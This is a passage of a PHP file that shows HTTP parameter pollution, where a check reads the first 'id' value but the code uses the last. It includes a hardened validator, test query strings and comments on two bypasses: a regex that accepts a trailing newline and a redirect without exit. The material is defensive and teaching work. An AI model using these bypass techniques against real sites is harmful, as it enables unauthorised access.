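    parse_str($qs, $params);
    return (isset($params['id']) && is_string($params['id'])) ? $params['id'] : null;
}

// Hardened reader: one parser, exactly one "id", digits only, and the caller uses
// the returned integer instead of going back to $_GET.
function readId(string $qs): ?int {
    $values = [];
    foreach (explode('&', $qs) as $pair) {
        [$key, $value] = array_pad(explode('=', $pair, 2), 2, '');
        if (urldecode($key) === 'id') {
            $values[] = urldecode($value);
        }
    }
    if (count($values) !== 1) {
        return null;                       // missing or repeated parameter: refuse
    }
    // ctype_digit() also rejects "1\n", which the page's /^\d+$/ would accept.
    if (!ctype_digit($values[0]) || strlen($values[0]) > 9) {
        return null;
    }
    return (int) $values[0];
}

foreach (['id=1', 'id=1&id=6', 'id=6&id=1', 'id=1&id=abc', 'name=x'] as $qs) {
    printf("%-14s checked=%-5s used=%-5s readId=%s\n", $qs,
        json_encode(firstId($qs)), json_encode(lastId($qs)), json_encode(readId($qs)));
}

// In a request handler the rejection has to end the request. The page's whitelist()
// sends the Location header but does not exit, so the query below it still runs.
// if (($id = readId($_SERVER['QUERY_STRING'])) === null) { http_response_code(400); exit; }
```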
